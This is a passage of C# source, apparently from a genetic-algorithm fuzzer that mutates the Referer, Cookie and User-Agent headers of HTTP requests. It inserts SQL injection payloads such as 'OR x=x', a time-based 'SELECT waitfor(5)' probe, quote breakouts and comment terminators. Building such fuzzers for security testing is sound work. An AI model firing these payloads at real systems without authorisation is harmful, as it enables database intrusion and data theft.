public Gen obfuscation(Gen input_gen)
{
if (input_gen == null)
{
return(input_gen);//we can not mutate obfuscation when gen is null(have no alphabate to obfuscate)
}
//at least one header was mutate before comming to obfuscation
if (!input_gen.mutated_header[0] && !input_gen.mutated_header[1] && !input_gen.mutated_header[2])
{
return(input_gen);
}
if (!input_gen.mutation_approach[0] && !input_gen.mutation_approach[1])//behavoiur change (or at least syntax...)must be applied before comming to obfuscation
{
return(input_gen);
}
Random r = new Random(Guid.NewGuid().GetHashCode());
int mutation_type = r.Next(3, 7); //(1,7)
int header = r.Next(0, 3); //to choose referee,user-agant or cookie header for mutation
while (true)
{
if (!input_gen.mutated_header[header])
{
header = r.Next(0, 3);
}
else
{
break;
}
}
input_gen.mutated_header[header] = true;
input_gen.mutation_approach[2] = true; //obfuscation
header++; //1-3 not 0-2
switch (mutation_type)
{
/*
* case 1://MO_wsp
*
* break;
* case 2://MO_html
* break;
*/
case 3: //MO_chr
input_gen.obfuscation[0] = true; //MO_chr
switch (header)
{
case 1: //referer
input_gen.httprequest.Referer = MO_chr(input_gen.httprequest.Referer);
break;
case 2: //cookie
input_gen.httprequest.Headers["Cookie"] = MO_chr(input_gen.httprequest.Headers["Cookie"]);
break;
case 3: //user-aganet
input_gen.httprequest.UserAgent = MO_chr(input_gen.httprequest.UserAgent);
break;
}
break;
case 4: //MO_per
input_gen.obfuscation[1] = true; //MO_per
switch (header)
{
case 1: //referer
input_gen.httprequest.Referer = MO_per(input_gen.httprequest.Referer);
break;
case 2: //cookie
input_gen.httprequest.Headers["Cookie"] = MO_per(input_gen.httprequest.Headers["Cookie"]);
break;
case 3: //user-aganet
input_gen.httprequest.UserAgent = MO_per(input_gen.httprequest.UserAgent);
break;
}
break;
case 5: //MO_bool
input_gen.obfuscation[2] = true; //MO_bool
switch (header)
{
case 1: //referer
input_gen.httprequest.Referer = MO_bool(input_gen.httprequest.Referer);
break;
case 2: //cookie
input_gen.httprequest.Headers["Cookie"] = MO_bool(input_gen.httprequest.Headers["Cookie"]);
break;
case 3: //user-aganet
input_gen.httprequest.UserAgent = MO_bool(input_gen.httprequest.UserAgent);
break;
}
break;
case 6: //MO_keyw
input_gen.obfuscation[3] = true; //MO_keyw
switch (header)
{
case 1: //referer
input_gen.httprequest.Referer = MO_keyw(input_gen.httprequest.Referer);
break;
case 2: //cookie
input_gen.httprequest.Headers["Cookie"] = MO_keyw(input_gen.httprequest.Headers["Cookie"]);
break;
case 3: //user-aganet
input_gen.httprequest.UserAgent = MO_keyw(input_gen.httprequest.UserAgent);
break;
}
break;
}
return(input_gen);
}
/// <summary>
/// mutate input gen by three existence condition: mo_OR,mo_AND,mo_Semi
/// </summary>
/// <param name="input_gen"></param>
/// <returns>return mutated gen</returns>
public Gen behavoiur_mutation(Gen input_gen)
{
if (input_gen == null)
{
return(input_gen);
}
//input gen was not null
if (input_gen.mutation_approach[0])//do not apply behavoiur mutation twice!
{
return(input_gen);
}
// Gen mutated_gen = new Gen();
Random r = new Random(Guid.NewGuid().GetHashCode());
int mutation_type = r.Next(1, 4);
int header = r.Next(0, 3);//two choose referee,user-agant or cookie header for mutation
input_gen.mutated_header[header] = true;
header++; //counting from 1 !
input_gen.mutation_approach[0] = true; //behavoiur
string temp;
switch (mutation_type)
{
case 1: //mo_OR
input_gen.behaviour_changing[0] = true;
switch (header)
{
case 1: //referer
// input_gen.mutated_header[0] = true;
if (input_gen.httprequest.Referer == null)
{
input_gen.httprequest.Referer = "OR x=x";
}
else
{
temp = input_gen.httprequest.Referer;
input_gen.httprequest.Referer = "OR x=x";
input_gen.httprequest.Referer += temp;
}
break;
case 2: //cookie
if (input_gen.httprequest.Headers["Cookie"] == null)
{
input_gen.httprequest.Headers.Add("Cookie", "OR x = x");
}
else
{
temp = input_gen.httprequest.Headers["Cookie"];
input_gen.httprequest.Headers["Cookie"] = "OR x = x";
input_gen.httprequest.Headers["Cookie"] += temp;
}
break;
case 3: //user-agant
// input_gen.mutated_header[2] = true;
if (input_gen.httprequest.UserAgent == null)
{
input_gen.httprequest.UserAgent = "OR x=x";
}
else
{
temp = input_gen.httprequest.UserAgent;
input_gen.httprequest.UserAgent = "OR x=x";
input_gen.httprequest.UserAgent += temp;
}
break;
}
break;
case 2: //mo_AND
input_gen.behaviour_changing[1] = true;
switch (header)
{
case 1: //referer
// input_gen.mutated_header[0] = true;
if (input_gen.httprequest.Referer == null)
{
input_gen.httprequest.Referer = "AND x=y";
}
else
{
temp = input_gen.httprequest.Referer;
input_gen.httprequest.Referer = "AND x=y ";
input_gen.httprequest.Referer += temp;
}
break;
case 2: //cookie
// input_gen.mutated_header[1] = true;
if (input_gen.httprequest.Headers["Cookie"] == null)
{
input_gen.httprequest.Headers.Add("Cookie", "AND x=y ");
}
else
{
temp = input_gen.httprequest.Headers["Cookie"];
input_gen.httprequest.Headers["Cookie"] = "AND x=y ";
input_gen.httprequest.Headers["Cookie"] += temp;
}
break;
case 3: //user-agant
// input_gen.mutated_header[2] = true;
if (input_gen.httprequest.UserAgent == null)
{
input_gen.httprequest.UserAgent = "AND x=y";
}
else
{
temp = input_gen.httprequest.UserAgent;
input_gen.httprequest.UserAgent = "AND x=y";
input_gen.httprequest.UserAgent += temp;
}
break;
}
break;
case 3: //mo_semi
input_gen.behaviour_changing[2] = true;
switch (header)
{
case 1: //referer
// input_gen.mutated_header[0] = true;
if (input_gen.httprequest.Referer == null)
{
input_gen.httprequest.Referer = "; SELECT waitfor(5) FROM dual";
}
else
{
temp = input_gen.httprequest.Referer;
input_gen.httprequest.Referer = "; SELECT waitfor(5) FROM dual";
input_gen.httprequest.Referer += temp;
}
break;
case 2: //cookie
if (input_gen.httprequest.Headers["Cookie"] == null)
{
input_gen.httprequest.Headers.Add("Cookie", "; SELECT waitfor(5) FROM dual");
}
else
{
temp = input_gen.httprequest.Headers["Cookie"];
input_gen.httprequest.Headers["Cookie"] = "; SELECT waitfor(5) FROM dual";
input_gen.httprequest.Headers["Cookie"] += temp;
}
break;
case 3: //user-agant
//input_gen.mutated_header[2] = true;
if (input_gen.httprequest.UserAgent == null)
{
input_gen.httprequest.UserAgent = "; SELECT waitfor(5) FROM dual";
}
else
{
temp = input_gen.httprequest.UserAgent;
input_gen.httprequest.UserAgent = "; SELECT waitfor(5) FROM dual";
input_gen.httprequest.UserAgent += temp;
}
break;
}
break;
}
input_gen.mutation_approach[0] = true;
return(input_gen);
}
public Gen syntax_repairing(Gen input_gen)
{
//check precondition
// if (!input_gen.mutation_approach[0])//behavoiur changinf applied before?
// return input_gen;//without change
// Gen mutated_gen = new Gen();
Random r = new Random(Guid.NewGuid().GetHashCode());
int mutation_type = r.Next(1, 4);
if (input_gen.syntax_repairing[mutation_type - 1])
{
return(input_gen); //this type of mutation was applied before!
}
int header = r.Next(0, 3); //two choose referee,user-agant or cookie header for mutation
input_gen.mutated_header[header] = true;
header++;
input_gen.mutation_approach[1] = true;
string temp = "";
switch (mutation_type)
{
case 1: //mo_par
input_gen.syntax_repairing[0] = true; //par
switch (header)
{
case 1: //referer
if (input_gen.httprequest.Referer == null)
{
input_gen.httprequest.Referer = ") ";
}
else
{
temp = input_gen.httprequest.Referer;
input_gen.httprequest.Referer = ") ";
input_gen.httprequest.Referer += temp;
}
break;
case 2: //cookie
if (input_gen.httprequest.Headers["Cookie"] == null)
{
input_gen.httprequest.Headers["Cookie"] = ") ";
}
else
{
temp = input_gen.httprequest.Headers["Cookie"];
input_gen.httprequest.Headers["Cookie"] = ") ";
input_gen.httprequest.Headers["Cookie"] += temp;
}
break;
case 3: //user-agant
if (input_gen.httprequest.UserAgent == null)
{
input_gen.httprequest.UserAgent = ") ";
}
else
{
temp = input_gen.httprequest.UserAgent;
input_gen.httprequest.UserAgent = ") ";
input_gen.httprequest.UserAgent += temp;
}
break;
}
break;
case 2: //mo_cmt
input_gen.syntax_repairing[1] = true; //cmt
int rand = r.Next(0, 2);
switch (header)
{
case 1: //referer
if (rand == 0)
{
if (input_gen.httprequest.Referer == null)
{
input_gen.httprequest.Referer = "#";
}
else
{
input_gen.httprequest.Referer += "#"; //# add to last of insertion
}
}
else
{
if (input_gen.httprequest.Referer == null)
{
input_gen.httprequest.Referer = "--";
}
else
{
input_gen.httprequest.Referer += "--";
}
}
break;
case 2: //cookie
if (input_gen.httprequest.Headers["Cookie"] == null)
{
if (rand == 0)
{
input_gen.httprequest.Headers["Cookie"] = "#";
}
else
{
input_gen.httprequest.Headers["Cookie"] = "--";
}
}
else
{
if (rand == 0)
{
input_gen.httprequest.Headers["Cookie"] += "#";
}
else
{
input_gen.httprequest.Headers["Cookie"] += "--";
}
}
break;
case 3: //user-agant
if (rand == 0)
{
if (input_gen.httprequest.UserAgent == null)
{
input_gen.httprequest.UserAgent = "#";
}
else
{
input_gen.httprequest.UserAgent += "#";
}
}
else
{
if (input_gen.httprequest.UserAgent == null)
{
input_gen.httprequest.UserAgent = "--";
}
else
{
input_gen.httprequest.UserAgent += "--";
}
}
break;
}
break;
case 3: //mo_qot
temp = "";
input_gen.syntax_repairing[2] = true; //qot
rand = r.Next(0, 2);
switch (header)
{
case 1: //referer
if (input_gen.httprequest.Referer != null)
{
temp = input_gen.httprequest.Referer;
}
if (rand == 0)
{
input_gen.httprequest.Referer = "' ";
}
else
{
input_gen.httprequest.Referer = "\" ";
}
if (temp != "")
{
input_gen.httprequest.Referer += temp;
}
break;
case 2: //cookie
if (input_gen.httprequest.Headers["Cookie"] == null)
{
if (rand == 0)
{
input_gen.httprequest.Headers["Cookie"] = "' ";
}
else
{
input_gen.httprequest.Headers["Cookie"] = "\" ";
}
}
else
{
temp = input_gen.httprequest.Headers["Cookie"];
if (rand == 0)
{
input_gen.httprequest.Headers["Cookie"] = "' ";
}
else
{
input_gen.httprequest.Headers["Cookie"] = "\" ";
}
input_gen.httprequest.Headers["Cookie"] += temp;
}
break;
case 3: //user-agant
if (input_gen.httprequest.UserAgent != null)
{
temp = input_gen.httprequest.UserAgent;
}
if (rand == 0)
{
input_gen.httprequest.UserAgent = "' ";
}
else
{
input_gen.httprequest.UserAgent = "\" ";
}
if (temp != "")
{
input_gen.httprequest.UserAgent += temp;
}
break;
}
break;
}
return(input_gen);
}
}//end mutation func
/// <summary>
/// merge two gen and create two new children where updated to gen pool instead their parents
/// </summary>
/// <param name="parent1"></param>
/// <param name="parent2"></param>
public Gen[] Merg_parents(Gen parent1, Gen parent2)
{
Gen[] childrens = new Gen[2];
Random r = new Random(Guid.NewGuid().GetHashCode());
int rand = r.Next(0, 2);//to choose mutation approach from mution_approach of parents(probility 50-50)
//detect mutation approach for parent1
//analysize parent2 and its mutation approach
//maybe parent2 had both mutation(syntatx and obfuscation)
//rand use to inherit mutation-approach randomly from his parents
if (rand == 0)
{
if (parent2.mutation_approach[1]) //parent2 had syntax mutation
{
childrens[0] = syntax_repairing(parent1); //updated parent1 inhertant syntax mutation from his parents
}
else if (parent2.mutation_approach[2]) //updated parent1 inhertant obfuscation from his parents
{
childrens[0] = obfuscation(parent1);
}
}
else //rand =1
{
if (parent2.mutation_approach[2])//parent2 had obfuscation mutation
{
childrens[0] = obfuscation(parent1);
}
else if (parent2.mutation_approach[1])//parent2 had syntax-mutation mutation
{
childrens[0] = syntax_repairing(parent1);
}
}
//detect mutation approach for parent2
//analysize parent1 and its mutation approach
if (!parent2.mutation_approach[0])
{
childrens[1] = behavoiur_mutation(parent2);//with no change
}
else
{
rand = r.Next(0, 2);
if (rand == 0)
{
if (parent1.mutation_approach[1]) //parent2 had syntax mutation
{
childrens[1] = syntax_repairing(parent2); //updated parent1 inhertant syntax mutation from his parents
}
else if (parent1.mutation_approach[2]) //parent2 had obfuscation mutation
{
childrens[1] = obfuscation(parent2);
}
}
else //rand =1
{
if (parent1.mutation_approach[2])//parent2 had obfuscation mutation
{
childrens[1] = obfuscation(parent2);
}
else if (parent1.mutation_approach[1])
{
childrens[1] = syntax_repairing(parent2);
}
}
}
return(childrens);
}
